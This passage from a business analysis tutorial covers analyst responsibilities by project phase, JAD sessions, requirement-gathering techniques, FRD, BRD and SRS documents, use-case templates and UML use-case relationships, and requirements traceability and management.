unambiguous and map them to real-time business needs of an organization. **As an Analyst** Another important role would be to assess proposed system and organizational readiness for system implementation and providing support to users and coordinate with IT staff. To help review and provide inputs to the design of the proposed IT system from the business perspective, resolving issues/conflicts among stakeholders, help organize comprehensive and quality UAT through assisting users in developing test cases, and help organize training with the aim of ensuring the deployed IT system which is capable of meeting business needs and requirements as well as realizing the anticipated benefits. Planning and monitoring the Business analysis activities for scope development, schedule and approach for performing the activities related to business analysis for the IT system development project, monitor the progress, coordinating with the Internal Project manager and report on revenue, profitability, risks and issues wherever appropriate. Key Responsibilities of a Business Analyst The responsibility set of a business analyst would require him to fulfill different duties in different phases of a project and they are elucidated below: Initiation Phase This phase will mark the beginning of a new project and a business analyst will vary out the following responsibilities: - Assist in carrying out the cost-benefit analysis of the project. - Understand the business case. - Ascertain the feasibility of the solution/project/product. - Help in creating the project charter. - Identify the stakeholders in the project. Planning Phase This phase will involve gathering the requirements and planning, how the project will be executed and managed. His responsibilities will include the below functions: - Eliciting the requirements - Analyze, organize and document requirements. - Manage requirements by creating Use-cases, RTM, BRD, SRS, etc. - Assess proposed solutions. - Liaise and enhance communications with stakeholders. - Assist in formulating the project management plans. - Help in finding the project’s scope, constraints, assumptions and risks. - Assist in designing the user experience of the solution. Executing Phase This phase marks the development of the solution as per the requirements gathered. The responsibilities include: - Explain requirements to the IT/development team. - Clarify doubts, concerns regarding the proposed solution to be developed. • Discuss and prioritize project scope changes and gain agreement. • Create beta tests scripts for initial testing. • Sharing the developing modules with stakeholders and solicit their feedback. • Following deadlines and manage stakeholder’s expectations. • Resolving conflicts and manage communications with the project team. Monitoring and Controlling Phase In this phase, the project is measured and controlled for any deviations from the initial plans. This phase runs simultaneously to the execution phase. • Developing test scripts and conducting comprehensive module and integration testing. • Conducting UAT (use acceptance testing) and creating testing reports. • Gain acceptance/approval of the deliverables from the client. • Explain the change requests to the development team. • Monitor the development of the change requests and verify their implementation as per the project’s objective. Closing Phase This phase marks the closure of the project. The responsibilities are: • Presenting the completed project to the client and gain their acceptance. • Create user-training manuals, any functional material and other instructional guides. • Conduct elaborate integration testing in production environment. • Create final product documentations, document project lessons learned. What a BA is Expected to Deliver? A Business Analyst serves as the bridge between the business users and the technical IT people. Their presence will contribute significantly to the success of IT projects. There are many benefits of having a dedicated business analyst. A dedicated business analyst can: • Delivers a clear project scope from a business point of view. • Develop sound business cases and more realistic estimation of resources and business benefits. • Prepares better reports on project scoping, planning and management in terms of costs and schedule, especially for large-scale IT projects. • Produces clear and concise requirements, which in turn, helps provide clearer and more accurate requirements, if the IT project is outsourced. - Elicit the real business needs from users and effectively manage user expectations. - Improves the quality of design for the proposed IT system so that it meets the user requirements. - Ensures the quality of the system developed before passing on to end-users for review and acceptance. - Arranges comprehensive quality test on the delivered systems and provide feedback to the technical IT people. A Business Analyst should be familiar with various analytical tools and related technologies when you are wearing the BA hat. I mean, if you are holding this position. As we have already learnt earlier, business analysis is a process where you are trying to understand a business enterprise and identifying opportunities, problem areas, problems and meeting a wide range of people having wide range of roles and responsibilities like CEO, VP, Director and understanding their business requirements. Fundamentally, there are 3 types of Business analysis which we can categorize into - - **Strategic Analysis**: Strategic business analysis deals with pre-project work. It is the method or process of identifying business problems, devising business strategies, goals and objectives helping the top management. It provides management information reporting for effective decision making process. - **Tactical Analysis**: It involves knowledge of specific business analysis techniques to apply at the right time in the appropriate project. - **Operational Analysis**: In this type of Business analysis, we are focussed towards the business aspect by leveraging information technology. It is also a process of studying operational systems with the aim of identifying opportunities for business improvement. For each type of analysis, there are a set of tools which are available in the market and based on organizational needs and requirements, these are to be used. However, to materialize business requirements into understandable information, a good BA will leverage techniques Fact-Finding, Interviews, Documentation Review, Questionnaires, Sampling and Research in their day-to-day activities. **Functional and Non-Functional Requirements** We can breakdown a requirement into two principal types like Functional and Non-functional requirements. For all the technology projects, functional and non-functional requirements must be segregated and separately analyzed. To define the proper tool and an appropriate technique might be a daunting challenge. Whether you are doing a brand-new application or making change to an existing application. Considering the right technique for the functional process is an art by itself. An overview of the widely-used business analysis techniques which are currently in the market: <table> <thead> <tr> <th>Processes</th> <th>Techniques</th> <th>Process Deliverables (Outcomes)</th> </tr> </thead> </table> | To Determine Functional and Non-Functional Requirements | • JAD Sessions • Scenarios and Use-cases • Organizational Modeling • Scope Modeling • Functional Decomposition • Interviews • Observation (Job Shadowing) • Focus Groups • Acceptance and Evaluation • Sequence Diagrams • User Stories • Brainstorming • Storyboarding • Prototyping • Structured Walk-through • Event Analysis • Business Rule analysis • Requirements Workshops • Risk Analysis • Root Cause Analysis | Business Requirements Documents: • Business and Functional Requirements • Non-Functional Requirements • Business Rules • Requirements Traceability Matrix Common Template: • Business Requirements Document | Applicability of Tools and Process Although there are a variety of tools and procedures available to business analysts, it all depends upon the current practices of the organization and how they would like to use it. For example, root-cause analysis is used when there is a requirement to go deeper into a certain important area or function. However, business requirements document is the most popular and accepted way to put the requirements in documentation format. In the subsequent chapters, we will be discussing some of the above techniques in-depth. Joint Application Development (JAD) is a process used to collect business requirements while developing new information systems for a company. The JAD process may also include approaches for enhancing user participation, expediting development and improving the quality of specifications. The intention of a JAD session is to pool in subject matter expert’s/Business analyst or IT specialist to bring out solutions. A Business analyst is the one who interacts with the entire group and gathers the information, analyses it and brings out a document. He plays a very important role in JAD session. Use of a JAD Session JAD sessions are highly structured, facilitated workshops that bring together customer decision makers and IT staff to produce high quality deliverables in a short period. In other words, a JAD Session enables customers and developers to quickly come to an agreement on the basic scope, objectives and specifications of a project or in case, not come to an agreement which means the project needs to be re-evaluated. Simply put, JAD sessions can - **Simplify**: It consolidates months of meetings and phone calls into a structured workshop. - **Identify**: Issues and participants - **Quantify**: Information and processing needs - **Clarify**: Crystallize and clarify all requirements agreed upon in the session. - **Unify**: The output from one phase of development is input to the next. - **Satisfy**: The customers define the system; therefore, it is their system. Shared participation brings a share in the outcome; they become committed to the systems success. Participants in a JAD Session The participants involved in a JAD session are as follows: Executive Sponsor An executive sponsor is the person who drives the project — the system owner. They normally are from higher positions and are able to make decisions and provide necessary strategy, planning and direction. **Subject Matter Expert** These are the business users and outside experts who are required for a successful workshop. The subject matter experts are the backbone of the JAD session. They will drive the changes. **Facilitator** He chairs the meeting; he identifies issues that can be solved as part of the meeting. The facilitator does not contribute information to the meeting. **Key Users** Key users or also called as super users in some instances have been used interchangeable and differs from company to company still. Key users are generally the business users who are more tightly aligned to the IT project and are responsible for the configuration of profiles of their team members during the projects. For Example: Suppose John is a key user and Nancy, Evan are users of a SAP system. In this instance, Nancy and Evan does not have access to change the functionality and profile whereas John being a Key user has access to edit profile with more authorizations. --- The JAD approach, in comparison with the more traditional practice, is thought to lead to faster development times and greater client satisfaction, because the client is involved throughout the development process. In comparison, in the traditional approach to systems development, the developer investigates the system requirements and develops an application, with client input consisting of a series of interviews. 6. Requirement Gathering Techniques Techniques describe how tasks are performed under specific circumstances. A task may have none or one or more related techniques. A technique should be related to at least one task. The following are some of the well-known requirements gathering techniques: **Brainstorming** Brainstorming is used in requirement gathering to get as many ideas as possible from a group of people. Generally used to identify possible solutions to problems, and clarify details of opportunities. **Document Analysis** Reviewing the documentation of an existing system can help when creating AS-IS process document, as well as driving gap analysis for scoping of migration projects. In an ideal world, we would even be reviewing the requirements that drove creation of the existing system – a starting point for documenting current requirements. Nuggets of information are often buried in existing documents that help us ask questions as part of validating requirement completeness. **Focus Group** A focus group is a gathering of people who are representative of the users or customers of a product to get feedback. The feedback can be gathered about needs/opportunities/problems to identify requirements, or can be gathered to validate and refine already elicited requirements. This form of market research is distinct from brainstorming in that it is a managed process with specific participants. **Interface analysis** Interfaces for a software product can be human or machine. Integration with external systems and devices is just another interface. User-centric design approaches are very effective at making sure that we create usable software. Interface analysis – reviewing the touch points with other external systems is important to make sure we don’t overlook requirements that aren’t immediately visible to users. **Interview** Interviews of stakeholders and users are critical to creating the great software. Without understanding the goals and expectations of the users and stakeholders, we are very unlikely to satisfy them. We also have to recognize the perspective of each interviewee, so that, we can properly weigh and address their inputs. Listening is the skill that helps a great analyst to get more value from an interview than an average analyst. Observation By observing users, an analyst can identify a process flow, steps, pain points and opportunities for improvement. Observations can be passive or active (asking questions while observing). Passive observation is better for getting feedback on a prototype (to refine requirements), where active observation is more effective at getting an understanding of an existing business process. Either approach can be used. Prototyping Prototyping is a relatively modern technique for gathering requirements. In this approach, you gather preliminary requirements that you use to build an initial version of the solution - a prototype. You show this to the client, who then gives you additional requirements. You change the application and cycle around with the client again. This repetitive process continues until the product meets the critical mass of business needs or for an agreed number of iterations. Requirement Workshops Workshops can be very effective for gathering requirements. More structured than a brainstorming session, involved parties collaborate to document requirements. One way to capture the collaboration is with creation of domain-model artifacts (like static diagrams, activity diagrams). A workshop will be more effective with two analysts than with one. Reverse Engineering When a migration project does not have access to sufficient documentation of the existing system, reverse engineering will identify what the system does. It will not identify what the system should do, and will not identify when the system does the wrong thing. Survey/Questionnaire When collecting information from many people – too many to interview with budget and time constraints – a survey or questionnaire can be used. The survey can force users to select from choices, rate something (“Agree Strongly, agree...”), or have open ended questions allowing free-form responses. Survey design is hard – questions can bias the respondents. The Functional Requirements Document (FRD) is a formal statement of an application’s functional requirements. It serves the same purpose as a contract. Here, the developers agree to provide the capabilities specified. The client agrees to find the product satisfactory if it provides the capabilities specified in the FRD. Functional requirements capture the intended behavior of the system. This behavior may be expressed as services, tasks or functions the system is required to perform. The document should be tailored to fit a particular project’s need. They define things such as system calculations, data manipulation and processing, user interface and interaction with the application. The Functional Requirements Document (FRD) has the following characteristics: - It demonstrates that the application provides value in terms of the business objectives and business processes in the next few years. - It contains a complete set of requirements for the application. It leaves no room for anyone to assume anything which is not stated in the FRD. - It is solution independent. The ERD is a statement of what the application is to do—not of how it works. The FRD does not commit the developers to a design. For that reason, any reference to the use of a specific technology is entirely inappropriate in an FRD. The functional requirement should include the following: - Descriptions of data to be entered into the system - Descriptions of operations performed by each screen - Descriptions of work-flows performed by the system - Descriptions of system reports or other outputs - Who can enter the data into the system? - How the system meets applicable regulatory requirements? The functional specification is designed to be read by a general audience. Readers should understand the system, but no technical knowledge should be required to understand this document. **Functional Requirements Deliverables** A Business Requirements Document (BRD) consists of: - **Functional Requirements**: A document containing detailed requirements for the system being developed. These requirements define the functional features and capabilities that a system must possess. Be sure that any assumptions and constraints identified during the Business Case are still accurate and up to date. • **Business Process Model:** A model of the current state of the process ("as is" model) or a concept of what the process should become ("to be" model) • **System Context Diagram:** A Context Diagram shows the system boundaries, external and internal entities that interact with the system, and the relevant data flows between these external and internal entities. • **Flow Diagrams (as-is or to-be):** Diagrams graphically depict the sequence of operations or the movement of data for a business process. One or more flow diagrams are included depending on the complexity of the model. • **Business Rules and Data Requirements:** Business rules define or constrain some aspects of the business and are used to define data constraints, default values, value ranges, cardinality, data types, calculations, exceptions, required elements and the relational integrity of the data. • **Data Models:** Entity Relationship Diagrams, Entity Descriptions, Class Diagrams • **Conceptual Model** - High level display of different entities for a business function and how they relate to one another. • **Logical Model:** Illustrates the specific entities, attributes and relationships involved in a business function and represents all the definitions, characteristics, and relationships of data in a business, technical, or conceptual environment. • **Data Dictionary and Glossary:** A collection of detailed information on the data elements, fields, tables and other entities that comprise the data model underlying a database or similar data management system. • **Stakeholder Map:** Identifies all stakeholders who are affected by the proposed change and their influence/authority level for requirements. This document is developed in the origination phase of the Project Management Methodology (PMM) and is owned by the Project Manager but needs to be updated by the project team as new/changed Stakeholders are identified throughout the process. • **Requirements Traceability Matrix:** A table that illustrates logical links between individual functional requirements and other types of system artifacts, including other Functional Requirements, Use-cases/User Stories, Architecture and Design Elements, Code Modules, Test Cases, and Business Rules. A Software Requirements Specification (SRS) is a document, which is used as a communication medium between the customers. A software requirement specification in its most basic form is a formal document used in communicating the software requirements between the customer and the developer. An SRS document concentrates on WHAT needs to be done and carefully avoids the solution (how to do). It serves as a contract between development team and the customer. The requirements at this stage is written using end user terminology. If necessary, later a formal requirement specification will be developed from it. SRS is a complete description of the behavior of a system to be developed and may include a set of use-cases that describes the interactions, the users will have with the software. **Purpose of SRS** SRS is a communication tool between Customer / Client, Business Analyst, System developers, Maintenance teams. It can also be a contract between purchaser and supplier. - It will give firm foundation for the design phase - Supports project management and control - Helps in controlling and evolution of system A software Requirement specification should be Complete, Consistent, Traceable, Unambiguous, and Verifiable. The following should be addressed in system specification: - Define the functions of the systems - Define the Hardware / Software Functional Partitioning - Define the Performance Specification - Define the Hardware / Software Performance Partitioning - Define Safety Requirements - Define the User Interface (user’s manual) - Provide Installation Drawings/Instructions - Software Requirement specification template Revision History <table> <thead> <tr> <th>Date</th> <th>Description</th> <th>Author</th> <th>Comments</th> </tr> </thead> <tbody> <tr> <td>&lt;date&gt;</td> <td>&lt;Version 1&gt;</td> <td>&lt;Your Name&gt;</td> <td>&lt;First Revision&gt;</td> </tr> </tbody> </table> Document Approval The following software requirements specification has been accepted and approved by the following: <table> <thead> <tr> <th>Signature</th> <th>Printed Name</th> <th>Title</th> <th>Date</th> </tr> </thead> <tbody> <tr> <td>&lt;Your Name&gt;</td> <td></td> <td>Lead Software Eng.</td> <td></td> </tr> <tr> <td>David</td> <td></td> <td>Instructor</td> <td></td> </tr> </tbody> </table> 9. Use-Cases One of the nine diagrams of UML’s are the Use-case Diagram. These are not only important but necessary requirement for software projects. It is basically used in Software life cycles. As we know there are various phases in the development cycle and the most used phase for Use-cases would be during the requirements gathering phase. What is a Use-Case? A use-case describes a sequence of actions, performed by a system that provides value to an actor. The use-case describes the system’s behavior under various conditions as it responds to a request from one of the stakeholders, called the primary actor. The actor is the Who of the system, in other words he the end user. In software and systems engineering, a use-case is a list of steps, typically defining interactions between a role (known in UML as an "actor") and a system, to achieve a goal. The actor can be a human or an external system. A use-case specifies the flow of events in the system. It is more concerned with what is performed by the system in order to perform the sequence of actions. Benefits of a Use-Case A use-case provides the following benefits: - It is an easy means of capturing the functional requirement with a focus on value added to the user. - Use-cases are relatively easy to write and read compared to the traditional requirement methods - Use-cases force developers to think from the end user perspective - Use-case engage the user in the requirement process The Anatomy of a Use-Case <table> <thead> <tr> <th>Name</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Name</td> <td>Descriptive name that illustrates the purpose of the use-case.</td> </tr> <tr> <td>Description</td> <td>Describes what the use-case does in couple of sentences.</td> </tr> <tr> <td>Actor</td> <td>List any actors that participate in the use-case</td> </tr> <tr> <td>Pre-condition</td> <td>Conditions that must be met prior to starting the use-case</td> </tr> <tr> <td>Flow of events</td> <td>Description of interaction between the system and the actor contains main flows and alternate flows.</td> </tr> <tr> <td>Post Condition</td> <td>Describe the state of the system after a use-case has run its course.</td> </tr> </tbody> </table> Guidance for Use-Case Template Document each use-case using the template given in the end of this chapter. This section provides a description of each section in the use-case template. Use-Case Identification - **Use-Case ID**: Give each use-case a unique numeric identifier, in hierarchical form: X.Y. Related use-cases can be grouped in the hierarchy. Functional requirements can be traced back to a labelled use-case. - **Use-Case Name**: State a concise, results-oriented name for the use-case. These reflect the tasks the user needs to be able to accomplish using the system. Include an action verb and a noun. Some examples: - View part number information. - Manually mark hypertext source and establish link to target. - Place an order for a CD with the updated software version. Use-Case History Here, we mention about the names of the people who are the stakeholders of the Use-case document. - **Created By**: Supply the name of the person who initially documented this use-case. - **Date Created**: Enter the date on which the use-case was initially documented. - **Last Updated By**: Supply the name of the person who performed the most recent update to the use-case description. - **Date Last Updated**: Enter the date on which the use-case was most recently updated. Use-Case Definition The following are the definitions of the key concepts of Use-Case: **Actor** An actor is a person or other entity external to the software system being specified who interacts with the system and performs use-cases to accomplish tasks. Different actors often correspond to different user classes, or roles, identified from the customer community that will use the product. Name the actor(s) that will be performing this use-case. **Description** Provide a brief description of the reason for and outcome of this use-case, or a high-level description of the sequence of actions and the outcome of executing the use-case. Preconditions List any activities that must take place, or any conditions that must be true, before the use-case can be started. Number each precondition. Examples: - User’s identity has been authenticated. - User’s computer has sufficient free memory available to launch task. Post Conditions Describe the state of the system at the conclusion of the use-case execution. Number each post condition. Examples - Document contains only valid SGML tags. - Price of item in database has been updated with new value. Priority Indicate the relative priority of implementing the functionality required to allow this use-case to be executed. The priority scheme used must be the same as that used in the software requirements specification. Frequency of Use Estimate the number of times this use-case will be performed by the actors per some appropriate unit of time. Normal Course of Events Provide a detailed description of the user actions and system responses that will take place during execution of the use-case under normal, expected conditions. This dialog sequence will ultimately lead to accomplishing the goal stated in the use-case name and description. This description may be written as an answer to the hypothetical question, “How do I accomplish the task stated in the use-case name>?” This is best done as a numbered list of actions performed by the actor, alternating with responses provided by the system. Alternative Courses Document other, legitimate usage scenarios that can take place within this use-case separately in this section. State the alternative course, and describe any differences in the sequence of steps that take place. Number each alternative course using the Use-case ID as a prefix, followed by “AC” to indicate “Alternative Course”. Example: X.Y.AC.1. Exceptions Describe any anticipated error conditions that could occur during execution of the use-case, and define how the system is to respond to those conditions. Also, describe how the system is to respond if the use-case execution fails for some unanticipated reason. Number each exception using the Use-case ID as a prefix, followed by “EX” to indicate “Exception”. Example: X.Y.EX.1. Includes List any other use-cases that are included ("called") by this use-case. Common functionality that appears in multiple use-cases can be split out into a separate use-case that is included by the ones that need that common functionality. Special Requirements Identify any additional requirements, such as nonfunctional requirements, for the use-case that may need to be addressed during design or implementation. These may include performance requirements or other quality attributes. Assumptions List any assumptions that were made in the analysis that led to accepting this use-case into the product description and writing the use-case description. Notes and Issues List any additional comments about this use-case or any remaining open issues or TBDs (To Be Determined) that must be resolved. Identify who will resolve each issue, the due date, and what the resolution ultimately is. Change Management and Version control Version control is the management of changes to documents, large websites, and other collection of information. Changes are usually identified by a number or letter code, termed as revision number or revision level. Each revision is associated with a timestamp and person making the change. An important part of the Unified Modeling Language (UML) is the facilities for drawing use-case diagrams. Use-cases are used during the analysis phase of a project to identify and partition system functionality. They separate the system into actors and use-cases. Actors represent roles that can be played by users of the system. Those users can be humans, other computers, pieces of hardware, or even other software systems. The only criterion is that they must be external to the part of the system being partitioned into use-cases. They must supply stimuli to that part of the system, and the system must receive outputs from it. Use-cases represent the activities that actors perform with the help of your system in the pursuit of a goal. We need to define what those users (actors) need from the system. Use-case should reflect user needs and goals, and should be initiated by an actor. Business, actors, Customers participating in the business use-case should be connected to the use-case by association. **Drawing Use-Case Diagrams** The Figure below shows, what a use-case might look like UML schematic form. The use-case itself looks like an oval. The actors are drawn as little stick figures. The actors are connected to the use-case with lines. ![Use-Case Diagram Example](image-url) Use-case 1: Sales Clerk checks out an item - Customer sets item on counter. - «uses» Swipe UPC Reader. - System looks up UPC code in database procuring item description and price - System emits audible beep. - System announces item description and price over voice output. - System adds price and item type to current invoice. - System adds price to correct tax subtotal So, the «uses» relationship is very much like a function call or a subroutine. The use-case being used in this fashion is called an abstract use-case because it cannot exist on its own but must be used by other uses cases. **Example — Withdrawal Use-Case** The goal of a customer in relation to our money vending machine (ATM) is to withdraw money. So, we are adding **Withdrawal** use-case. Withdrawing money from the vending machine might involve a bank for the transactions to be made. So, we are also adding another actor – **Bank**. Both actors participating in the use-case should be connected to the use-case by association. Money vending machine provides Withdrawal use-case for the customer and Bank actors. --- **Scenario of a Typical Banking Transaction** **Relationships between Actors and Use-Cases** Use-cases could be organized using following relationships: - Generalization - Association - Extend - Include **Generalization between Use-Cases** There may be instances where actors are associated with similar use-cases. In such case a Child use-case inherits the properties and behavior of the parent use. Hence we need to generalize the actor to show the inheritance of functions. They are represented by a solid line with a large hollow triangle arrowhead. **Association between Use-Cases** Associations between actors and use-cases are indicated in use-case diagrams by solid lines. An association exists whenever an actor is involved with an interaction described by a use-case. **Extend** There are some functions that are triggered optionally. In such cases the extend relationship is used and the extension rule is attached to it. Thing to remember is that the base use-case should be able to perform a function on its own even if the extending use-case is not called. Extend relationship is shown as a dashed line with an open arrowhead directed from the extending use-case to the extended (base) use-case. The arrow is labeled with the keyword «extend». **Include** It is used to extract use-case fragments that are duplicated in multiple use-cases. It is also used to simplify large use-case by splitting it into several use-cases and to extract common parts of the behaviors of two or more use-cases. Include relationship between use-cases which is shown by a dashed arrow with an open arrowhead from the base use-case to the included use-case. The arrow is labeled with the keyword «include». Use-cases deal only in the functional requirements for a system. Other requirements such as business rules, quality of service requirements, and implementation constraints must be represented separately. The diagram shown below is an example of a simple use-case diagram with all the elements marked. **Basic Principles for Successful Application of Use-cases** - Keep it simple by telling stories - Be productive without perfection - Understand the big picture - Identify reuse opportunity for use-cases - Focus on value - Build the system in slices - Deliver the system in increments - Adapt to meet the team’s needs Use-Case Template Here, we have shown a sample template of a Use-Case which a Business Analyst can fill so that the information can be useful for the technical team to ascertain information about the project. <table> <thead> <tr> <th>Use-case ID:</th> <th></th> </tr> </thead> <tbody> <tr> <td>Use-case Name:</td> <td></td> </tr> <tr> <td>Created By:</td> <td>Last Updated By:</td> </tr> <tr> <td>Date Created:</td> <td>Date Last Updated:</td> </tr> <tr> <td>Actor:</td> <td></td> </tr> <tr> <td>Description:</td> <td></td> </tr> <tr> <td>Preconditions:</td> <td></td> </tr> <tr> <td>Post conditions:</td> <td></td> </tr> <tr> <td>Priority:</td> <td></td> </tr> <tr> <td>Frequency of Use:</td> <td></td> </tr> <tr> <td>Normal Course of Events:</td> <td></td> </tr> <tr> <td>Alternative Courses:</td> <td></td> </tr> <tr> <td>Exceptions:</td> <td></td> </tr> <tr> <td>Includes:</td> <td></td> </tr> <tr> <td>Special Requirements:</td> <td></td> </tr> <tr> <td>Assumptions:</td> <td></td> </tr> <tr> <td>Notes and Issues:</td> <td></td> </tr> </tbody> </table> Gathering software requirements is the foundation of the entire software development project. Soliciting and gathering business requirements is a critical first step for every project. In-order to bridge the gap between business and technical requirements, the business analysts must fully understand the business needs within the given context, align these needs with the business objectives, and properly communicate the needs to both the stakeholders and development team. The key stakeholders wish that someone could explain customer / client requirements in plain English. Will this benefit them from understanding the value at a high-level? This will be the main-focus area, as they will try to map the documentation with the requirements and how BA could communicate in the best possible way. **Why Projects Fail** There are many reasons why projects fail but some of the common areas include the below - Market and Strategy Failure - Organizational and Planning Failures - Quality Failures - Leadership and Governance failures - Skills, Knowledge and competency failures - Engagement, team work and communication failures **Major Issues** Too often projects fail due to poorly managed requirements Complex and changing communication hurdles At the core of the issue is that projects are increasingly complex, changes occur and communication is challenging. **Why Successful Teams do Requirements Management** Requirements management is about keeping your team in-sync and providing visibility to what is going on within a project. It is critical to the success of your projects for your whole team to understand what you are building and why – that’s how we define requirements management. The “why” is important because it provides context to the goals, feedback and decisions being made about the requirements. This increases predictability of future success and potential problems, allowing your team to quickly course correct any issues and successfully complete your project on time and within budget. As a starting point, it’s valuable for everyone involved to have a basic understanding of what requirements are, and how to manage them. **Let’s Start with the Basics** A requirement is a condition or capability needed by a stakeholder to solve a problem or achieve an objective. A condition or capability that must be met or possessed by a system or system. Component to satisfy a contract, standard, specification, or other formally imposed documents. A requirement can be expressed with text, sketches, detailed mockups or models, whatever information best communicates to an engineer what to build, and to a QA manager what to test. Depending on your development process, you might use different terminology to capture requirements. High-level requirements are sometimes referred to simply as needs or goals. Within software development practices, requirements might be referred to as “use-cases”, “features” or “functional requirements”. Even more specifically within agile development methodologies, requirements are often captured as epics and stories. Regardless of what your team calls them or what process you use; requirements are essential to the development of all products. Without clearly defining requirements you could produce an incomplete or defective product. Throughout the process there can be many people involved in defining requirements. A stakeholder might request a feature that describes how the product will provide value in solving a problem. A designer might define a requirement based on how the final product should look or perform from a usability or user interface standpoint. A business analyst might create a system requirement that adheres to specific technical or organizational constraints. For today’s sophisticated products and software applications being built, it often takes hundreds or thousands of requirements to sufficiently define the scope of a project or a release. Thus, it’s imperative that the team be able to access, collaborate, update, and test each requirement through to completion, as requirements naturally change and evolve over time during the development process. Now that we’ve defined the value of requirements management at a high-level, let’s go deeper into the four fundamentals that every team member and stakeholder can benefit from understanding: - Planning good requirements: “What the heck are we building?” - Collaboration and buy-in: “Just approve the spec, already!” - Traceability & change management: “Wait, do the developers know that changed?” - Quality assurance: “Hello, did anyone test this thing?” Does everyone know what we’re building and why? That’s the value of requirements management. **Collaboration & Buy-In from Stakeholders** Is everyone in the loop? Do we have approval on the requirements to move forward? These questions come up during development cycles. It would be great if everyone could agree on requirements, but for large projects with many stakeholders, this does not usually happen. Trying to get everyone in agreement can cause decisions to be delayed, or worse, not made at all. Gaining consensus on every decision is not always easy. In practice, you don’t necessarily want “consensus,” you want “buy-in” from the group and approval from those in control so you can move the project forward. With consensus, you are trying to get everyone to compromise and agree on the decision. With buy-in, you are trying to get people to back the best solution, make a smart decision and do what is necessary to move forward. You don’t need everyone to agree that the decision is the best. You need everyone to support the decision. Team collaboration can help in receiving support on decisions and in planning good requirements. Collaborative teams work hard to make sure everyone has a stake in projects and provides feedback. Collaborative teams continuously share ideas, typically have better communication and tend to support decisions made because there is a shared sense of commitment and understanding of the goals of the project. It’s when developers, testers, or other stakeholders feel “out of the loop” that communication issues arise, people get frustrated and projects get delayed. Once everyone has bought-in to the scope of work, it is imperative for requirements to be clear and well documented. Keeping track of all the requirements is where things get tricky. Imagine having a to-do list a mile long that involves collaborating with multiple people to complete. How would you keep all those items straight? How would you track how one change to an item would affect the rest of the project? This is where traceability and change management add value. So, what makes a good requirement? A good requirement should be valuable and actionable; it should define a need as well as provide a pathway to a solution. Everyone on the team should understand what it means. Requirements vary in complexity. - A good Requirements Document can be part of a group with high-level requirements broken down into sub-requirements. - They may also include very detailed specifications that include a set of functional requirements describing the behavior or components of the end-product. - Good requirements need to be concise and specific, and should answer the question, “what do we need?” Rather than, “how do we fulfil a need?” - Good requirements ensure that all stakeholders understand their part of the plan; if parts are unclear or misinterpreted the final product could be defective or fail. Preventing failure or misinterpretation of requirements can be aided by receiving feedback from the team continuously throughout the process as requirements evolve. Continuous collaboration and buy-in with everyone is a key to success. **Requirement Gathering and Analysis** A requirement is a condition or capability needed by a stakeholder to solve a problem or achieve an organizational objective; a condition or capability that must be met or possessed by a system. *Requirement analysis* in software engineering covers those tasks that go into determining the needs or conditions to meet for a new or altered product taking account of the possible conflicting requirements of various stakeholders, analyzing, documenting, validating and managing software or system requirements. The requirements should be: - Documented - Actionable - Measurable - Testable - Traceable Requirements should be related to identified business needs or opportunities, and defined to a level of detail sufficient for system design. A Business analyst gathers information through observing the existing systems, studying the existing procedures, discussions with the customers and the end users. The analyst should also have imaginative and creative skills in absence of a working System. Analyzing the gathered requirement to find the missing links is requirement analysis. **Eliciting Approach** To elicit the objectives, ask the business expert, the development manager, and the project sponsor the following questions: - What business objectives of the company will this project help achieve? - Why are we doing this project now? - What will happen if we do it later? - What if we do not do it at all? - Who will benefit from this project? - Do the people who will benefit from it consider it the most important improvement that can possibly be made at this time? - Should we be doing a different project instead? Possible objectives might be reducing costs, improving the customer service, simplifying the work flow, replacing obsolete technology, piloting a new technology, and many others. Also, make sure you understand exactly how the proposed project will help accomplish the stated objective. **Different Types of Requirements** The most common types of requirement which a Business analyst is interested would be the following: **Business Requirements** Business requirements are the critical activities of an enterprise that must be performed to meet the organizational objectives while remaining solution independent. A business requirements document (BRD) details the business solution for a project including the documentation of customer needs and expectations. **User Requirements** User requirements should specify the specific requirements which the user expects/wants from software to be constructed from the software project. A user requirement should be Verifiable, Clear and concise, Complete, Consistent, Traceable, Viable. The user requirements document (URD) or user requirements specification is a document usually used in software engineering that specifies what the user expects the software to be able to do. System Requirements System requirements deal with defining software resources requirements and pre-requisites that needs to be installed on a computer to provide optimal functioning of an application. Functional Requirements Functional requirements capture and specify specific intended behavior of the system being developed. They define things such as system calculations, data manipulation and processing, user interface and interaction with the application, and other specific functionality that show how user requirements are satisfied. Assign a unique ID number to each requirement. Non-Functional Requirements Non-functional requirement is the one which specifies criteria that can be used to judge the operation of a system rather than specific behaviors. System architecture speaks on the plan for implementing non-functional requirements. Non-functional requirements speak on how the system should look like or it can be mentioned like “system shall be”. Non-functional requirements are called as qualities of the system. Transition Requirements Transition Requirements describe capabilities that the solution must fulfill in order to facilitate transition from the current state of the enterprise to a desired future state, but that will not be needed once that transition is complete. They are differentiated from other requirements types, because they are always temporary in nature and because they cannot be developed until both an existing and new solution is defined. They typically cover data conversion from existing systems, skill gaps that must be addressed, and other related changes to reach the desired future state. They are developed and defined through solution assessment and validation. Traceability & Change Management Requirements traceability is a way to organize, document and keep track of all your requirements from initial idea generation through to the testing phase. The requirements traceability matrix (RTM) provides a method for tracking the functional requirements and their implementation through the development process. Each requirement is included in the matrix along with its associated section number. As the project progresses, the RIM is updated to reflect each requirement’s status. When the product is ready for system testing, the matrix lists each requirement, what product component addresses it, and what test verifies that it is correctly implemented. Sample Screenshot of an automated traceability tool Include columns for each of the following in the RTM: - Requirement description - Requirement reference in FRD - Verification Method - Requirement reference in Test Plan Example: Connecting the dots to identify the relationships between items within your project. It is a connector of common downstream flow. Idea Requirements Design Test Business Objectives You should be able to trace each of your requirements back to its original business objective. By tracing requirements, you are able to identify the ripple effect changes have, see if a requirement has been completed and whether it’s being tested properly. Traceability and change management provides managers peace of mind and the visibility needed to anticipate issues and ensure continuous quality. Quality Assurance Getting requirements delivered right the first time can mean better quality, faster development cycles and higher customer satisfaction with the product. Requirements management not only helps you get it right, but also helps your team save money and many headaches throughout the development process. Concise, specific requirements can help you detect and fix problems early, rather than later when it is much more expensive to fix. In addition, it can cost up to 100 times more to correct a defect later in the development process after it’s been coded, than it is to correct early on while a requirement. By integrating requirements management into your quality assurance process, you can help your team increase efficiency and eliminate rework. Moreover, rework is where most of the cost issues occur. In other words, development teams are wasting majority of their budgets on efforts that are not performed correctly the first time. For example, a developer codes a feature based on an old specification document, only to learn later, that the requirements for that feature changed. These types of issues can be avoided with effective requirements management best practices. In summary, requirements management can sound like a complex discipline, but when you boil it down to a simple concept – it’s about helping teams answer the question, “Does everyone understand what we’re building and 